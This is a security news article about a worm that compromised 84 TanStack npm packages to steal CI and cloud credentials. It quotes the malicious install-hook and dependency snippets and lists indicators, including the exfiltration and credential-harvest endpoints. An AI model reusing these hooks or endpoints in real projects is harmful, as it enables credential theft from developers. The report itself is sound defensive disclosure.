The attackers injected a sophisticated credential-stealing payload designed to silently harvest secrets from continuous integration environments, including GitHub Actions pipelines.
Packages such as React Router, downloaded over 12 million times weekly, were among those modified, exposing millions of development pipelines to credential theft at a global scale.
Security analysts at Socket reported that their AI-powered scanner flagged all compromised package artifacts within just six minutes of initial publication.
The attack is part of a rapidly expanding malware campaign dubbed Mini Shai-Hulud, which has since spread beyond npm to infect packages across the Python Package Index.
High-profile targets, including OpenSearch, Mistral AI, Guardrails AI, and UiPath, were subsequently confirmed as infected.
A taunting message left on the attacker’s infrastructure, signed by TeamPCP, boasted that credentials had been actively stolen for hours while the investigation was underway.
At the heart of the compromise sits a heavily obfuscated script, router_init.js, which functions as a self-contained supply-chain worm.
The payload uses extensive string rotation and hex encoding to evade static analysis. Once executed, it detaches silently from the parent terminal and sweeps the environment for sensitive secrets specifically targeting GitHub Actions workflow tokens, AWS metadata endpoints, Kubernetes service account certificates, and HashiCorp Vault clusters.
The malware injects a malicious optionalDependencies block into the victim project’spackage.json, pointing to a standalone malicious GitHub commit.
"optionalDependencies": {
"@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}Because npm automatically triggers prepare Lifecycle hooks, when resolving git-based dependencies, the tanstack_runner.js payload executes immediately duringnpm install, silently infecting the developer’s machine or CI pipeline.
json{
"scripts": {
"prepare": "bun run tanstack_runner.js && exit 1"
}
}Rather than using traditional command-and-control servers, stolen credentials are exfiltrated through the Session decentralized peer-to-peer network, making malicious traffic appear nearly identical to standard encrypted messaging.
For persistence, the malware writes hidden copies of itself into Claude Code and Visual Studio Code configuration directories, ensuring the stealer restarts every time a developer opens their workspace.
TanStack maintainers published a postmortem attributing the breach to a chained attack against their GitHub Actions pipeline.
Attackers exploited a vulnerable pull_request_target workflow pattern to poison the cache and execute malicious code during automated testing.
Critically, the threat actors did not steal static npm publishing tokens; instead, they extracted runtime OpenID Connect tokens directly from the runner process memory, allowing them to authenticate through trusted publisher bindings and push poisoned updates to the npm registry.
TanStack has since deprecated all affected versions, purged workflow caches, and implemented strict repository guards.
Developers are strongly urged to audit their environments for unexpected script files and rotate all cloud credentials immediately.
| Type | Indicator | Description |
|---|---|---|
| File | router_init.js / router_runtime.js | Primary worm payload |
| SHA256 | ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c | router_init.js hash |
| SHA1 | 12ed9a3c1f73617aefdb740480695c04405d7b4b | router_init.js hash |
| MD5 | 833fd59ebe66a4449982c6d18db656b4 | router_init.js hash |
| File | tanstack_runner.js | Secondary runner payload |
| SHA256 | 2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96 | tanstack_runner.js hash |
| SHA1 | e7d582b98ca80690883175470e96f703ef6dc497 | tanstack_runner.js hash |
| MD5 | b82e54923f7e440664d2d75bd31588ca | tanstack_runner.js hash |
| URL | hxxp://filev2[.]getsession[.]org/file/ | C2 exfiltration endpoint |
| URL | hxxp://169[.]254[.]169[.]254/latest/api/token | AWS EC2 IMDSv2 token harvest |
| URL | hxxp://169[.]254[.]170[.]2 | AWS ECS metadata credential harvest |
| URL | hxxps://api[.]github[.]com/repos/ | GitHub secrets enumeration |
| URL | hxxps://registry[.]npmjs[.]org/-/npm/v1/tokens | npm token validation |
| Host | vault[.]svc[.]cluster[.]local:8200 | In-cluster HashiCorp Vault endpoint |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
The post 84 TanStack npm Packages Compromised in Ongoing Supply-Chain Attack Targeting CI Credentials appeared first on Cyber Security News.
show-when is a Web Component library that shows or hides HTML content based on URL,…
WASHINGTON, DC (WOWO) Michigan members of Congress have introduced bipartisan legislation aimed at prohibiting the…
Two employee devices at OpenAI were compromised in a sweeping software supply chain attack targeting…
A maximum-severity zero-day vulnerability in Cisco Catalyst SD-WAN Controller is being actively exploited in the…
This article originally appeared on Inside Climate News, a nonprofit, non-partisan news organization that covers…
INDIANAPOLIS, IND. (WOWO) Three employees with the United States Postal Service are facing felony charges…
This website uses cookies.